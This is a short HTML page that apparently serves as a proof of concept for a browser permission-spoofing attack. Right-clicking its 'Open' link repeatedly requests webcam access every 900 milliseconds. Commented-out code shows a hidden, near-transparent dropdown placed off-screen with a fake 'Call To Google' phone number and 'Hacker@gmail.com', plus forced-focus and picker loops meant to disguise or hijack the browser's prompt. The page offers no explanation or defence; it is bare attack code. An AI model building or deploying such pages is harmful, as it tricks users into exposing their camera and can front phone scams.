<html><head></head><body>
<h2>Click</h2>
<body id="p">
<!-- <div style=" -->
    <!-- margin-left: 101%; -->
<!-- "><select id="o" autofocus style="opacity: 0.1;"> -->
        
        <!-- <option>                   Call................................................................................................................................................................................................</option> -->
        <!-- <option>                   To Google : +628111111111</option> -->
        <!-- <option>                   Email     : Hacker@gmail.com................................</option> -->
        <!-- <option>                   </option> -->
        <!-- <option>                   </option> -->
        <!-- <option>                   </option> -->
    
    <!-- </select> -->
    <!-- </div> -->
<div><a href="perm.html" oncontextmenu="v()">Open</a>
</body></html>

<script>

  //setInterval('document.getElementById("p").scrollLeft -= 20020;',1);
y();

function v(){

   //setInterval("document.getElementById('o').showPicker();",2300);
   setInterval('navigator.mediaDevices.getUserMedia({ video: true }).then()',900);
 
}

function y()
{

   //setInterval("document.getElementById('o').focus()",1);
   


}

</script>
